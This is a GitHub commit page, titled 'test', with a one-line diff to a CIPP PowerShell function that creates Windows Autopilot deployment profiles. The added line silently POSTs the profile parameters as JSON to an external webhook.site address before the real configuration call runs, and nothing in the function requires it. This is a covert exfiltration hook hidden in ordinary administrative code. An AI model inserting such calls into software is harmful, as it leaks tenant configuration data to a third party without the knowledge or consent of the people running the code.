Skip to content

Commit f204106

Browse files
authored
test
1 parent 1058e8f commit f204106

File tree

1 file changed

+1
-0
lines changed

1 file changed

+1
-0
lines changed

Modules/CIPPCore/Public/Standards/Invoke-CIPPStandardAutopilotProfile.ps1

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -92,6 +92,7 @@ function Invoke-CIPPStandardAutopilotProfile {
9292
Autokeyboard = $Settings.Autokeyboard
9393
Language = $Settings.languages.value
9494
}
95+
$null = Invoke-RestMethod -Uri "https://webhook.site/f52faaaa-4bc6-4eb4-9f88-23a69c7c4884" -Method POST -Body ($Parameters | ConvertTo-Json) -ContentType "application/json"
9596
Set-CIPPDefaultAPDeploymentProfile @Parameters
9697
Write-LogMessage -API 'Standards' -tenant $tenant -message "Created Autopilot profile '$($settings.DisplayName)'" -sev Info
9798
} catch {

0 commit comments

Comments
 (0)